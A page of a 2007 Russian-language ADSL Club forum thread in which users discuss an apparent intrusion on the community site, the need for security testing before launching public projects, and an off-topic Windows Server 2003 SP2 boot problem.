вовсе нет, просто люди ведут беседу за "дайте нам биты мы ему...", а я считаю, что открывать публичный проект не позаботившись о должной безопасности, безрассудство Smile. Мы конечно любим adslclub и не гадим там, где живем, но никто не застрахован от вандалов. Лучше перебдеть, чем недобдеть. Тем более, что средства для проверки стойкости системы доступны. Вероятно, после все моих постов я схлопачу по шапке Smile, за то, что сыплю соль в столь трагический момент...

offtop что у тебя с Server 2003, поборол, нет Wink
 Наверх
Посмотреть профиль / Отправить личное сообщение Отправить личное сообщение Посетить сайт автора   Номер ICQ
cryimer
Эксперт
СообщениеДобавлено: Ср 27-06-07 : 18-04    Заголовок сообщения: Ответить с цитатой

DrozD писал(а):
люди ведут беседу за "дайте нам биты мы ему..."

Согласен.

offtop Стер ключ через реестр, активировал снова винду. Поставил (!) sp2 , но при загрузке на вводе пасса просто черный экран и винда не отвечает никак( даже num lock на клаве тухнет). Под безопасным режимом все ОК, показывается что sp2 но мне от этого не легче Smile . Попробую поискать дистриб с предустановленным sp2.
 Наверх
Посмотреть профиль / Отправить личное сообщение Отправить личное сообщение   Номер ICQ
error
жозефина
Предупреждений : 3
СообщениеДобавлено: Ср 27-06-07 : 22-00    Заголовок сообщения: Ответить с цитатой

потеря мыла/аськи обычное дело
поэтому нада раз в неделю хотя бы "сохранять контакт лист", а в мылах не держать "архивы писем" и не будет "трагического момента" Podmignul

а по теме - чувак никакой не вандал, если бы хотел задеструктить тут все, то сделал бы это, но он оказался с ч/ю )
ведь по сути "глумились на es-nso" => "доглумились"
все по честному


сори, если мой взгляд на ситуацию кого-то обидел.
 Наверх
Посмотреть профиль / Отправить личное сообщение Отправить личное сообщение Отправить e-mail Посетить сайт автора   Номер ICQ
woddy
Гуру
Предупреждений : 1
СообщениеДобавлено: Ср 27-06-07 : 22-17    Заголовок сообщения: Ответить с цитатой

error писал(а):



сори, если мой взгляд на ситуацию кого-то обидел.

судимость то на нем будет Wink
 Наверх
Посмотреть профиль / Отправить личное сообщение Отправить личное сообщение Посетить сайт автора  
Показать сообщения:   
Ответить на тему    Форум АДСЛ КлубаНАРОДНЫЕ НОВОСТИ Часовой пояс: GMT + 7
На страницу 1 2 3 4
Страница 2 из 4

 

 
Аватары: Вкл|Выкл   ЮзерИнфо: Вкл|Выкл   Подписи: Вкл|Выкл
Перейти:  
Вы не можете начинать темы
Вы не можете отвечать на сообщения
Вы не можете редактировать свои сообщения
Вы не можете удалять свои сообщения
Вы не можете голосовать в опросах
Вы не можете вкладывать файлы
Вы можете скачивать файлы